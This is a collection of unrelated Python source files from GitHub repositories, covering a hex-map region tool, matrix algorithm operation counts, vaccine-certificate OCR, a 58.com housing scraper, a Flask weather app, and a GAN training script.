event.scenePos() )\n this_rid = self.parent.accessHexRegion(loc, self.tool_layer()) # region under hex, none if no region\n if self._selected_rid == -1:\n # make new region\n if this_rid is None:\n hex_here = Hex(hex_to_screen(loc))\n\n actual_hex = self.parent.accessHex(loc)\n new_region = self.regionType(hex_here)\n new_region.set_geography(actual_hex.geography)\n if self.tool_layer()==ToolLayer.civilization:\n new_region.set_name(create_name(\"county\", filename=self.widget_instance.text_source))\n else:\n new_region.set_name(create_name(new_region.geography, filename=self.widget_instance.text_source))\n action = New_Region_Action(region=new_region, rid=self.parent.get_next_rid(self.tool_layer()), layer=self.tool_layer())\n self.select(action.rID)\n #self._selected_rid = action.rID\n return action\n else:\n # choose the region under the cursor \n self.select(this_rid)\n #self._selected_rid = this_rid\n return NullAction()\n\n else:\n # add to the selected region or add \n if this_rid is None:\n # add to that region\n # [\"rID\", 'hexID']\n return Region_Add_Remove(rID = self._selected_rid, hexID=loc, layer=self.tool_layer())\n else:\n self.select(this_rid)\n #self._selected_rid = this_rid\n return NullAction()\n\n @classmethod\n def widget(self):\n return RegionWidget\n\n @classmethod\n def buttonIcon(cls):\n assert(os.path.exists(os.path.join(art_dir, \"biome_brush.svg\")))\n return QtGui.QPixmap(os.path.join(art_dir, \"biome_brush.svg\")).scaled(48,48)\n\n @classmethod\n def altText(cls):\n 
return \"Biome Draw Tool\"\n\n\nclass CivAdd(RegionAdd):\n def __init__(self, parent):\n super().__init__(parent)\n self.regionType = County\n\n @classmethod\n def tool_layer(cls):\n return ToolLayer.civilization\n\n @classmethod\n def buttonIcon(cls):\n assert(os.path.exists(os.path.join(art_dir, \"county.svg\")))\n return QtGui.QPixmap(os.path.join(art_dir, \"county.svg\")).scaled(48,48)\n\n @classmethod\n def altText(cls):\n return \"County Draw Tool\"","repo_name":"BenSmithers/MultiHex2","sub_path":"MultiHex2/tools/regiontools.py","file_name":"regiontools.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16014631140","text":"import numpy as np\nimport random\n\nsize_array = []\n\nfor i in range(1, 21):\n size_array.append(i*i)\n\ntime = 0\noutputList_a = []\noutputList_b = []\noutputList_c = []\nstr_sequential = []\nstr_parallel_a = []\nstr_parallel_b = []\nstr_parallel_c = []\nwhile time < 20:\n N = size_array[time]\n\n X = np.zeros([N, N], dtype=int)\n\n Y = np.copy(X)\n\n result = np.copy(X)\n\n for a in range(N):\n for b in range(N):\n X[a][b] = random.randint(0, 10*N)\n Y[a][b] = random.randint(0, 10*N)\n\n sequential_count = 0\n parallel_count = 0\n\n # iterate through rows of X\n for i in range(N):\n # iterate through columns of Y\n for j in range(N):\n # iterate through rows of Y\n parallel_count = parallel_count+1\n for k in range(N):\n sequential_count = sequential_count+1\n result[i][j] += X[i][k] * Y[k][j]\n str_sequential.append(sequential_count)\n str_parallel_a.append(parallel_count)\n the_string_to_write_on_file = str(\n N)+\" \"+str(sequential_count)+\" \"+str(parallel_count)\n outputList_a.append(the_string_to_write_on_file)\n parallel_count = 0\n result = np.zeros([N, N], dtype=int)\n for i in range(N):\n # iterate through columns of Y\n for j in range(N):\n # iterate through rows of Y\n parallel_count = parallel_count+1\n for k in range(N):\n result[i][(j + k) % N] += X[i][k] * Y[k][(j + k) % N]\n str_parallel_b.append(parallel_count)\n the_string_to_write_on_file = str(\n N)+\" \"+str(sequential_count)+\" \"+str(parallel_count)\n outputList_b.append(the_string_to_write_on_file)\n\n\n parallel_count = 0\n result = np.zeros([N, N], dtype=int)\n\n for a in range(N):\n operation_no = 1+(N-1)*a\n parallel_count = parallel_count+operation_no\n X[a] = np.roll(X[a], -a)\n\n for b in range(N):\n operation_no = 1+(N-1)*b\n parallel_count = parallel_count+operation_no\n Y[:, b] = np.roll(Y[:, b], -b, axis=0)\n\n for k in range(N):\n for i in range(N):\n for j in range(N):\n\n result[i][j] += X[i][j] * Y[i][j]\n\n for a in range(N):\n parallel_count = parallel_count+(N-1)+1\n X[a] = np.roll(X[a], -1)\n for b in range(N):\n parallel_count = parallel_count+(N-1)+1\n Y[:, b] = np.roll(Y[:, b], -1, axis=0)\n\n str_parallel_c.append(parallel_count)\n the_string_to_write_on_file = str(\n N)+\" \"+str(sequential_count)+\" \"+str(parallel_count)\n print\n outputList_c.append(the_string_to_write_on_file)\n\n time = time + 1\n\nWritingOnOutFile_a = open(\"Question1_a.txt\", \"w\")\nWritingOnOutFile_a.write('\\n'.join(outputList_a))\nWritingOnOutFile_a.close()\n\nWritingOnOutFile_b = open(\"Question1_b.txt\", \"w\")\nWritingOnOutFile_b.write('\\n'.join(outputList_b))\nWritingOnOutFile_b.close()\n\nWritingOnOutFile_c = open(\"Question1_c.txt\", \"w\")\nWritingOnOutFile_c.write('\\n'.join(outputList_c))\nWritingOnOutFile_c.close()\n\nprint(\"Algorithm Type, Input Size = 1,Input Size = 
2,Input Size = 3,Input Size = 4,Input Size = 5,Input Size = 6,Input Size = 7,Input Size = 8,Input Size = 9,Input Size = 10,Input Size = 11\")\nprint(\"Sequential Algorithm,\", end=\"\")\n\n\n\nfor k,item in enumerate(str_sequential):\n if k != len(str_sequential)-1:\n print(item, end=\",\")\n else:\n print(item)\n\nprint(\"CRCW Algorithm,\", end=\"\")\n\nfor k,item in enumerate(str_parallel_a):\n if k != len(str_parallel_a)-1:\n print(item, end=\",\")\n else:\n print(item)\n\nprint(\"EREW Algorithm,\", end=\"\")\n\nfor k,item in enumerate(str_parallel_b):\n if k != len(str_parallel_b)-1:\n print(item, end=\",\")\n else:\n print(item)\n\nprint(\"2-D Meshes Algorithm,\", end=\"\")\n\nfor k,item in enumerate(str_parallel_c):\n if k != len(str_parallel_c)-1:\n print(item, end=\",\")\n else:\n print(item)\n","repo_name":"sarismet/MPI-Algorithm-Analysis","sub_path":"ismetsariQ1.py","file_name":"ismetsariQ1.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20907076748","text":"import cv2\nimport pytesseract\nimport numpy as np\nfrom pyzbar.pyzbar import decode\nfrom pdf2img import convertPdf\nfrom pprint import pprint\nfrom itertools import islice\n\n\npytesseract.pytesseract.tesseract_cmd = r'D:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\n\n\ndef nth_index(iterable, value, n):\n matches = (idx for idx, val in enumerate(iterable) if val == value)\n return next(islice(matches, n-1, n), None)\n\n\ndef getDataFromFile(file):\n imgName = convertPdf(file)\n image = 'upload/images/'+imgName+\".jpg\"\n # print(\"image path is : \", image)\n img = cv2.imread(image)\n img2Decode = img\n # img = cv2.resize(img, (0, 0), fx=0.4, fy=0.4)\n\n heightImg, widthImg, _ = img.shape\n # Extracting text position from image\n boxes = pytesseract.image_to_data(img)\n words = []\n for x, b in enumerate(boxes.splitlines()):\n # print(b)\n\n if x != 0:\n b = b.split()\n # print(b)\n # Text only exists if length == 12\n if(len(b) == 12):\n words.append(b[11])\n # x, y, width, height = int(b[6]), int(\n # b[7]), int(b[8]), int(b[9])\n # # Using the returned coordinates to draw rectangles around the text\n # cv2.rectangle(img, (x, y), (width+x, height+y), (0, 0, 255), 3)\n # cv2.putText(img, b[11], (x, y),\n # cv2.FONT_HERSHEY_COMPLEX, 1, (50, 50, 255), 2)\n\n # Extracting Data from QR code in image\n code = decode(img2Decode)\n\n # Converting extracted data to readable text\n qrContent = str(code[0].data.decode('UTF-8'))\n\n values = qrContent.split(',')\n\n values[0] = values[0][1:]\n values[-1] = values[-1][:-1]\n\n dict = {}\n\n # Creating dictionary from QR Code data\n for value in values:\n value = value.replace('\"', '')\n # print(value)\n dict[value[:value.index(':')]] = value[value.index(':')+1:]\n # print(values)\n\n # print(dict)\n # Evax number = 16\n dateDose2 = []\n if(words[words.index('vaccin:')+1] != 'JENSSEN'):\n dateDose2 = words[words.index('2:')+1:words.index('N°')]\n wordsDict = {\n \"numEvax\": words[words.index(\"EVAX:\")+1],\n 'nomEtPrenom': words[words.index('Prénom:')+1:words.index('Carte')],\n 'idNumber': words[words.index(\"nationale:\")+1],\n 'dateOfBirth': words[words.index(\"naissance:\")+1:nth_index(words, \"Informations\", 2)],\n 'refVaccin': words[words.index(':')+1],\n 'nomDeVaccin': words[words.index('vaccin:')+1],\n 'dateDose1': words[words.index('1:')+1:nth_index(words, 'Date', 3)],\n 'dateDose2': dateDose2,\n }\n\n # pprint(wordsDict)\n # cv2.imwrite(\"Result.jpeg\", 
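    # nth_index above returns the position of the n-th occurrence of a value in a sequence,\n    # e.g. nth_index(['Date', 'x', 'Date'], 'Date', 2) == 2 (illustrative values only)\n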
    # pprint(wordsDict)\n    # cv2.imwrite(\"Result.jpeg\", img)\n    # print(words)\n    return({\"dict\": dict, \"words\": wordsDict})\n\n    # dict = eval(code[0].data.decode('UTF-8'))\n    # print(dict)\n    # cv2.imshow('Result', img)\n    # cv2.waitKey(0)\n","repo_name":"TarekBenYahia/VaccineDataExtract","sub_path":"extractData.py","file_name":"extractData.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"17804761582","text":"'''\nauthor - Pramod\ndate - 20-1-2021\npackage -functional programs\nTitle - Euclidean distance from 1 point to origin\n'''\n\nfrom sys import argv\nfrom math import sqrt,pow\nprint('enter two integers (x,y):',argv)\nargs=argv[1:]\ntry:\n    a,b=int(args[0]),int(args[1])\n    # distance from (a, b) to the origin is sqrt(a^2 + b^2)\n    distance = sqrt(pow(a,2)+pow(b,2))\n    print('Euclidean distance is:',distance)\nexcept ValueError:\n    print('provide integer input')\n","repo_name":"pramod-cpu/python","sub_path":"functional programs/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12792987647","text":"# from ushuffle import shuffle, Shuffler\nfrom Bio import SeqIO\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.Seq import Seq\nfrom statistics import median, quantiles\n\n# filename = './animals_asu_database.fasta'\nfilename = './iniciallimpo.fasta'\n# filename = './negativos1limpo.fasta'\n\nsequences = [i for i in SeqIO.parse(filename,'fasta')]\n\nprint(len(sequences))\n\nsequence_a = sequences[0]\nseqSize = []\n\n\n\n\nfor seq in sequences:\n    seqSize.append(len(str(seq.seq)))\n\ntotal = 0\nminSize = 0\nmaxSize = 0\n\nfor size in seqSize:\n    total = total + size\n\n    if(size < minSize or minSize == 0):\n        minSize = size\n\n    if(size > maxSize or maxSize == 0):\n        maxSize = size\n\naverage = total / len(seqSize)\nmedianValue = median(seqSize)\n\nprint(seqSize)\nprint(f\"Total: {total}\")\nprint(f\"Média: {average}\")\nprint(f\"Tamanho mínimo: {minSize}\")\nprint(f\"Tamanho máximo: {maxSize}\")\nprint(f\"Mediana: {medianValue}\")\nprint(quantiles(seqSize, n=4))\n","repo_name":"nalualvarez/telomerase","sub_path":"codes/tamanho.py","file_name":"tamanho.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3227207725","text":" # noqa\n\nfrom copy import deepcopy\n\nfrom flowbber.components import Source\n\n\nclass ConfigSource(Source):\n\n    def declare_config(self, config):\n        config.add_option(\n            'data',\n            schema={\n                'type': 'dict',\n                'empty': False,\n            },\n        )\n\n    def collect(self):\n        return deepcopy(self.config.data.value)\n\n\n__all__ = ['ConfigSource']\n","repo_name":"kuralabs/flowbber","sub_path":"lib/flowbber/plugins/sources/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"28404284352","text":"import requests\nimport re\nimport json\n\n\nclass FetchInstagramUser():\n\n    def __init__(self):\n        self.base_url = 'https://www.instagram.com/'\n        self.pattern = '\", html, re.S)[0]\n        res = re.sub(\"\\s\", \"\", res)\n        dic = json.loads(res)\n        for k, v in dic.items():\n            for k1, v1 in v.items():\n                dic[k][k1] = v1.split(\"|\")[0]\n        city_dict = {}\n\n        def traverse_dict(dic: dict):\n            for k, v in dic.items():\n                if k == \"海外\" or k == \"其他\":\n                    continue\n                if isinstance(v, dict):\n                    traverse_dict(v)\n                city_dict[k] = v\n\n        traverse_dict(dic)\n\n
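        # Illustrative example (hypothetical data): {'北京': {'朝阳': 'cy', '海淀': 'hd'}}\n        # flattens so that city_dict['朝阳'] == 'cy'; the '海外'/'其他' buckets are skipped.\n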
        other_city = re.findall(\"independentCityList = (.*?)var\", html, re.S)[0]\n        res = re.sub(\"\\s\", \"\", other_city)\n        other_city_dic = json.loads(res)\n\n        for k, v in other_city_dic.items():\n            other_city_dic[k] = v.split(\"|\")[0]\n\n        city_dict.update(other_city_dic)\n        self.all_city_dict = city_dict\n\n\n    def info_zufang(self, city:str = \"武汉\"):\n        '''Spider method that crawls rental listings.'''\n        assert self.all_city_dict is not None, \"获取所有城市信息失败\"\n        print(\"---all_city_dict---\")\n        format_city = self.all_city_dict.pop(city, None)\n        print(\"format_city:\", format_city)\n        assert format_city is not None, \"{}该城市不在爬取城市之内\".format(city)\n\n        '''Build this city's rental page url and fetch the data we need.'''\n        self.city = city \n        start_url = \"https://{}.58.com/chuzu/j2/\".format(format_city)\n\n        # collect the price info on every page\n        self.__spiders(start_url)\n\n\n    def info_xinfang(self, city:str = \"武汉\"):\n        '''Spider method that crawls new-home (purchase) listings.'''\n        assert self.all_city_dict is not None, \"获取所有城市信息失败\"\n        print(\"---all_city_dict---\")\n        format_city = self.all_city_dict.pop(city, None)\n        print(\"format_city:\", format_city)\n        assert format_city is not None, \"{}该城市不在爬取城市之内\".format(city)\n        \n        '''Build this city's new-home page url and fetch the data we need.'''\n        self.city = city \n        start_url = \"https://{}.58.com/xinfang/loupan/all/\".format(format_city)\n\n        # collect the price info on every page\n        self.__spiders2(start_url)\n        \n\n\n\n    def __get_html_source(self, url, params=None):\n        '''Fetch the page source with a GET request.'''\n        time.sleep(2)\n        headers = self.session.headers.copy()\n        try:\n            if not params:\n                params = {}\n            response = self.session.get(url=url, headers=headers, params=params)\n            return response\n        except Exception as e:\n            with open(\"./url_log_error.txt\", \"a\", encoding=\"utf-8\") as f:\n                f.write(str(datetime.datetime.now()) + \"\\n\")\n                f.write(str(e) + \"\\n\")\n                f.write(\"error_url>>:{}\".format(url) + \"\\n\")\n\n\n    def __get_price(self, response):\n\n        html = response.text\n\n        # extract the data we want from the page\n        xml = etree.HTML(html)\n        xpath_list = xml.xpath(\"//div[@class='money']/b[@class='strongbox']\")\n        for price_info_list in xpath_list:\n            house_price = re.sub(\"\\s\", \"\", price_info_list.xpath(\n                \"string(.)\"))\n            house_price = int(house_price)\n            # print(house_price)\n            if house_price > self.highest:\n                self.highest = house_price \n            if house_price and house_price < self.lowest:\n                self.lowest = house_price\n\n\n    def __get_xinfang_info(self, url, params):\n        response = self.__get_html_source(url, params)\n        html = response.text\n\n        # extract the data we want from the page\n        xml = etree.HTML(html)\n        # \n        xpath_list = xml.xpath(\"//p[@class='price']/span|//p[@class='favor-tag around-price']/span\")[0]\n        \n        house_price = re.sub(\"\\s\", \"\", xpath_list.xpath(\"string(.)\"))\n        # house_price = int(house_price)\n        unit = re.sub(\"<.*>\", \"\", etree.tostring(xpath_list, encoding='UTF-8').decode()).strip()\n        xpath_list = xml.xpath(\"//span[@class='building-area']\")[0]\n        area = re.sub(\"\\s\", \"\", xpath_list.xpath(\"string(.)\")).split(':')[1]\n        return house_price, unit, area\n    \n    \n\n\n\n    def __response_to_xml(self, response):\n        try:\n            xml = etree.HTML(response.text)\n            # print(response.text)\n            return xml\n        except AttributeError:\n            raise CustomException(10000, \"response对象转换为xml失败,错误的链接地址为>>:{}\".format(response))\n\n\n    def __is_exist_next_page(self, response):\n        '''Check for a next page: return its link if present, otherwise False.'''\n        xml = self.__response_to_xml(response)\n        try:\n            next_page_url = xml.xpath(\"//a[@class='next']/@href\")[0]\n            # print(next_page_url)\n            return next_page_url\n        except IndexError:\n            return False\n\n    def __spiders(self, url):\n        '''Crawl the rental listings page by page.'''\n        page_num = 1\n        params = None \n        while True:\n            print(\"正在爬取{}--第{}页数据...\".format(self.city, page_num))\n            time.sleep(2)\n            # url = format_url.format(page_num)\n            response = self.__get_html_source(url, params)\n            self.__get_price(response) \n\n            # check whether there is another page\n            url = self.__is_exist_next_page(response)\n            print(url)\n            if not url:\n                print(\"{}爬取完毕\".format(self.city))\n                return\n            page_num += 1\n\n    def __spiders2(self, url):\n        '''Crawl the new-home listings.'''\n        params = None\n        time.sleep(1)\n\n        url_h = url + \"h2_s1/\"\n        url_l = url + \"h2_s2/\"\n        \n        self.highest, self.unit_h, self.area_h = self.__get_xinfang_info(url_h, params)\n        self.lowest, self.unit_l, self.area_l = self.__get_xinfang_info(url_l, params)\n\n    \n    \n    \n# //*[@id=\"tab-customer\"]\nif __name__ == '__main__':\n    city20 = [\"重庆\",\"上海\",\"北京\",\"成都\",\"天津\",\"广州\",\"深圳\",\"武汉\",\n            \"南阳\",\"临沂\",\"石家庄\",\"哈尔滨\",\"苏州\",\"保定\",\"郑州\",\"西安\",\n            \"赣州\",\"邯郸\",\"温州\",\"潍坊\"]\n    # city20 = [\"重庆\"]\n    city_58 = Info_58()\n    zufang_list = []\n    xinfang_list = []\n    for city in city20:\n        # city_58.highest = 0\n        # city_58.lowest = float('inf')\n        # city_58.info_zufang(city)\n        # zufang_list.append([city, city_58.highest, city_58.lowest])\n        city_58.info_xinfang(city)\n        xinfang_list.append([city,city_58.highest+'('+city_58.unit_h+')',city_58.area_h,\n                            city_58.lowest+'('+city_58.unit_l+')', city_58.area_l])\n\n    columns_z = [\"城市\", \"最高价\", \"最低价\"]\n    columns_x = [\"城市\", \"最高价(单位)\", \"面积(最高)\",\"最低价(单位)\",\"面积(最低)\"]\n    dt = pd.DataFrame(xinfang_list, columns=columns_x)\n    dt.to_csv(\"buy_csv.csv\", mode='a', index=0)\n","repo_name":"goen-kkk/webcrawler","sub_path":"58Info.py","file_name":"58Info.py","file_ext":"py","file_size_in_byte":8064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20119721775","text":"from flask import Flask, render_template, request, flash\nimport requests\n\ndef resultado(lat, lon):\n    api_key = \"\" # Insert a valid API key. \n    OWM_Endpoint = \"https://api.openweathermap.org/data/2.5/onecall\"\n\n    weather_params = {\n        \"lat\": lat,\n        \"lon\": lon,\n        \"appid\": api_key,\n        \"exclude\": \"hourly,minutely,daily\"\n    }\n\n    response = requests.get(OWM_Endpoint, params=weather_params)\n\n    response.raise_for_status()\n    data_json = response.json()\n    clima_atual = data_json[\"current\"][\"weather\"][0][\"id\"]\n\n
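    # OpenWeatherMap groups condition ids by hundreds: 2xx thunderstorm, 3xx drizzle,\n    # 5xx rain, 6xx snow, 7xx atmosphere, 800 clear and 801-804 clouds, which is what\n    # the ranges below test against.\n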
    if int(clima_atual) >= 200 and int(clima_atual) <= 232:\n        retorno = \"Melhor pegar um guarda chuva! Tempestade!\"\n    elif int(clima_atual) >= 500 and int(clima_atual) <= 531:\n        retorno = \"Melhor pegar um guarda chuva! Está Chovendo!\"\n    elif int(clima_atual) >= 600 and int(clima_atual) <= 622:\n        retorno = \"É natal? Pois está nevando!!!\"\n    elif int(clima_atual) > 781 and int(clima_atual)<= 800:\n        retorno = \"Está tudo limpo! Ótimo para sair de casa!\"\n    elif int(clima_atual) >= 801:\n        retorno = \"Está nublado!\"\n    else:\n        # fallback so retorno is always defined (e.g. drizzle 3xx or mist 7xx codes)\n        retorno = \"Sem classificação para esse tempo.\"\n    return retorno\n\napp = Flask(__name__)\napp.secret_key = \"samhow\"\n\n@app.route(\"/home\")\ndef home():\n    flash(\"Seu resultado irá aparecer aqui!\")\n    return render_template(\"index.html\")\n\n@app.route(\"/result\", methods=[\"POST\", \"GET\"])\ndef result():\n    flash(resultado(lat=float(str(request.form[\"input1\"])), lon=float(str(request.form[\"input2\"]))))\n    return render_template(\"index.html\")\n\nif __name__ == '__main__':\n    app.run(debug=True,port=5001)","repo_name":"Gabriel-Maires/WeatherBrasil","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8694291097","text":"\"\"\" -------------------------------------------------------------------------------------------------------------------\r\nITEC 136: Homework 09 - 02\r\n\r\nProvide different code snippets for\r\neach of the following complexities.\r\n\r\nO(n^2)\r\nO(n)\r\nO(1)\r\nO( nlog(n) )\r\nO( log(n) )\r\n\r\n@author: Dani Hooven\r\n@version: 11/06/2020\r\n\r\n-------------------------------------------------------------------------------------------------------------------- \"\"\"\r\n\r\nn = 16  # example input size so the snippets below can actually run\r\nmydict = {'x': 0}  # example dict for the O(1) snippet\r\n\r\n\r\n# O(n^2)\r\ntest = 0\r\nfor i in range(n):\r\n    for j in range(n):\r\n        test = test + i * j\r\n\r\n\r\n# O(n)\r\ntest = 0\r\nfor i in range(n):\r\n    test = test + 1\r\n\r\nfor j in range(n):\r\n    test = test - 1\r\n\r\n\r\n# O(log n)\r\ni = n\r\nwhile i > 0:\r\n    k = 2 + 2\r\n    i = i // 2\r\n\r\n\r\n# O(1) - index assignment\r\nmydict['x'] = mydict['x'] + 1\r\n\r\n\r\n# O(nlog(n))\r\ndef anagramSolution2(s1,s2):\r\n    alist1 = list(s1)\r\n    alist2 = list(s2)\r\n\r\n    alist1.sort()\r\n    alist2.sort()\r\n\r\n    pos = 0\r\n    matches = True\r\n\r\n    while pos < len(s1) and matches:\r\n        if alist1[pos]==alist2[pos]:\r\n            pos = pos + 1\r\n        else:\r\n            matches = False\r\n\r\n    return matches\r\n\r\nprint(anagramSolution2('abcde','edcba'))
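\r\n\r\n# A rough (illustrative) way to sanity-check a growth rate is to time a snippet\r\n# at doubling input sizes with timeit and watch how the cost scales:\r\nimport timeit\r\nfor size in (1000, 2000, 4000):\r\n    t = timeit.timeit(lambda: sum(1 for _ in range(size)), number=100)\r\n    print(size, round(t, 5))  # for an O(n) loop the time roughly doubles with size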
","repo_name":"danihooven/Principles-of-Programming","sub_path":"Homework09/homework09_02.py","file_name":"homework09_02.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5426500619","text":"import os\nimport shutil\nimport numpy as np\nimport pandas as pd\nimport argparse \nimport torch\n\nimport torchvision.transforms.functional as Functional\n# import torch.nn._reduction as _Reduction\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\n\nimport random\nimport matplotlib.pyplot as plt\n\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.utils as vutils\n\nfrom model.model import *\nfrom utils.dataload import build_annoations, CustomImageDataset\n\ndef remove_z_depth(path):\n    # remove all Z_depth images\n    root_path = path\n\n    for root, dirs, files in os.walk(root_path):\n        for file in files:\n            if 'Z_depth' in file:\n                os.remove(os.path.join(root, file))\n\ndef copy_folder_content(src_path, dest_path):\n    # construct the src path and file name\n    files = os.listdir(src_path)\n\n    os.makedirs(dest_path, exist_ok=True)\n\n    for f in files:\n        output_fname = f\n        if os.path.exists(os.path.join(dest_path, output_fname)):\n            i = len(files)\n            while os.path.exists(os.path.join(dest_path, output_fname)):\n                output_fname = f.split('.')[0][:-4] #take image name\n                output_fname = output_fname + '-' + str(i).zfill(4) + '.png'\n                i += 1\n        shutil.copyfile(os.path.join(src_path, f), os.path.join(dest_path, output_fname))\n        \ndef copy_imgs(root_path, output_path):\n    for root, dirs, _ in os.walk(root_path):\n        for dir in dirs:\n            if dir in [str(i) for i in range(10)]:\n                print('copying', os.path.join(root,dir))\n                copy_folder_content(os.path.join(root,dir), output_path)\n\ndef show(imgs):\n    if not isinstance(imgs, list):\n        imgs = [imgs]\n    fig, axs = plt.subplots(ncols=len(imgs), squeeze=False)\n    for i, img in enumerate(imgs):\n        img = img.detach()\n        img = Functional.to_pil_image(img)\n        axs[0, i].imshow(np.asarray(img))\n        axs[0, i].set(xticklabels=[], yticklabels=[], xticks=[], yticks=[])\n\ndef weights_init(m):\n    classname = m.__class__.__name__\n    if classname.find('Conv') != -1:\n        nn.init.normal_(m.weight.data, 0.0, 0.02)\n    elif classname.find('BatchNorm') != -1:\n        nn.init.normal_(m.weight.data, 1.0, 0.02)\n        nn.init.constant_(m.bias.data, 0)\n\nclass CustomLoss(nn.Module):\n    def __init__(self):\n        super(CustomLoss, self).__init__()\n\n    def forward(self, output, target, mask):\n        # masked pixel-wise BCE: the mask weights zero out pixels outside the\n        # region of interest, then the loss is averaged over the valid pixels\n        error = nn.functional.binary_cross_entropy(output, target, weight=mask, reduction='none')\n        error = torch.sum(error, dim=(1,2))\n        non_zero = torch.count_nonzero(mask, (1,2))\n\n        error = torch.mean(torch.div(error, non_zero))\n\n        return error\n    \nif __name__ == '__main__':\n    print('Start')\n\n    parser = argparse.ArgumentParser()\n    #TODO add others illuminants\n    parser.add_argument('--data_dir', type=str, default='/scratch/gfurnari/transparent/D65', help='path to the dataset')\n    parser.add_argument('--label_dir', type=str, default='/scratch/gfurnari/transparent/SHADE', help='path to the labels')\n    parser.add_argument('--batch', type=int, default=32, help='batch size')\n    parser.add_argument('--output_dir', type=str, default='/scratch/gfurnari/albedo-output/exp-1/', help='output directory pathname')\n    parser.add_argument('--epochs', type=int, default=10, help='number of epochs')\n    parser.add_argument('--lr', type=float, default=1e-3, help='initial learning rate')\n    parser.add_argument('--beta1', type=float, default=0.5, help='beta1 value')\n    parser.add_argument('--workers', help='Number of workers for dataloader', default=1)\n    parser.add_argument('--ngpu', type=int, default=1, help='number of gpus')\n\n    opt = parser.parse_args()\n\n    ## ARGUMENTS ##\n    # Root directory for dataset\n    dataroot = \"/content/imgs\"\n    # Number of workers for dataloader\n    workers = opt.workers\n    # Batch size during training\n    batch_size = opt.batch\n    # Number of training epochs\n    num_epochs = opt.epochs\n    # Learning rate for optimizers\n    lr = opt.lr\n    # Beta1 hyperparam for Adam optimizers\n    beta1 = opt.beta1\n    # Number of GPUs available. 
Use 0 for CPU mode.\n ngpu = opt.ngpu\n\n data_path = opt.data_dir #'/scratch/gfurnari/transparent/D65'\n label_path = opt.label_dir #'/scratch/gfurnari/transparent/SHADE'\n output_dir = opt.output_dir #'/scratch/gfurnari/transparent-output'\n\n # Set random seed for reproducibility\n manualSeed = 999\n #manualSeed = random.randint(1, 10000) # use if you want new results\n print(\"Random Seed: \", manualSeed)\n random.seed(manualSeed)\n torch.manual_seed(manualSeed)\n\n #run just once\n # remove_z_depth('/scratch/gfurnari/transparent/')\n\n annotations = build_annoations(data_path)\n print(len(annotations))\n annotations.head()\n\n os.makedirs(output_dir, exist_ok=True)\n annotations.to_csv(os.path.join(output_dir,'annotations.csv'),index=False)\n\n image_size = 256 \n\n transform = transforms.Compose([\n transforms.Resize(image_size),\n # transforms.ToTensor(),\n # transforms.ConvertDtype(torch.float),\n transforms.ConvertImageDtype(torch.float),\n # normalize_images\n # transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), \n ])\n \n training_data = CustomImageDataset(os.path.join(output_dir,'annotations.csv'), transform, transform)\n train_dataloader = DataLoader(training_data, batch_size=batch_size, shuffle=True)\n\n train_features, labels, masks = next(iter(train_dataloader))\n\n device = torch.device(\"cuda:0\" if (torch.cuda.is_available() and ngpu > 0) else \"cpu\")\n print(device)\n\n # Create the generator\n netG = Generator(ngpu).to(device)\n\n # Handle multi-gpu if desired\n if (device.type == 'cuda') and (ngpu > 1):\n netG = nn.DataParallel(netG, list(range(ngpu)))\n\n # Apply the weights_init function to randomly initialize all weights\n # to mean=0, stdev=0.02.\n netG.apply(weights_init)\n\n # Print the model\n print(netG)\n\n # Create the Discriminator\n netD = SiameseDiscriminatorPixelWise(ngpu).to(device)\n\n # Handle multi-gpu if desired\n if (device.type == 'cuda') and (ngpu > 1):\n netD = nn.DataParallel(netD, list(range(ngpu)))\n\n # Apply the weights_init function to randomly initialize all weights\n # to mean=0, stdev=0.2.\n netD.apply(weights_init)\n\n # Print the model\n print(netD) \n \n # Initialize BCELoss function\n criterion = CustomLoss()\n # criterion = BCELoss()\n\n # Create batch of latent vectors that we will use to visualize\n # the progression of the generator\n\n real_batch = next(iter(train_dataloader))\n fixed_noise = real_batch[0].to(device) # fixed images\n\n # Establish convention for real and fake labels during training\n real_label = 1.\n fake_label = 0.\n\n # Setup Adam optimizers for both G and D\n optimizerD = optim.Adam(netD.parameters(), lr=lr, betas=(beta1, 0.999))\n optimizerG = optim.Adam(netG.parameters(), lr=lr, betas=(beta1, 0.999))\n\n # Training Loop\n\n # Lists to keep track of progress\n img_list = []\n G_losses = []\n D_losses = []\n iters = 0\n\n print(\"Starting Training Loop...\")\n # For each epoch\n for epoch in range(num_epochs):\n # For each batch in the dataloader\n for i, data in enumerate(train_dataloader, 0):\n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n ## Train with all-real batch\n netD.zero_grad()\n # Format batch\n real_cpu = data[1].to(device)\n real_data = data[0].to(device)\n\n b_size = real_cpu.size(0)\n label = torch.full((b_size,256,256), real_label, dtype=torch.float, device=device)\n\n # Forward pass real batch through D\n output = netD(real_cpu, real_data).view(b_size,256,256)\n\n ## add mask\n mask = 
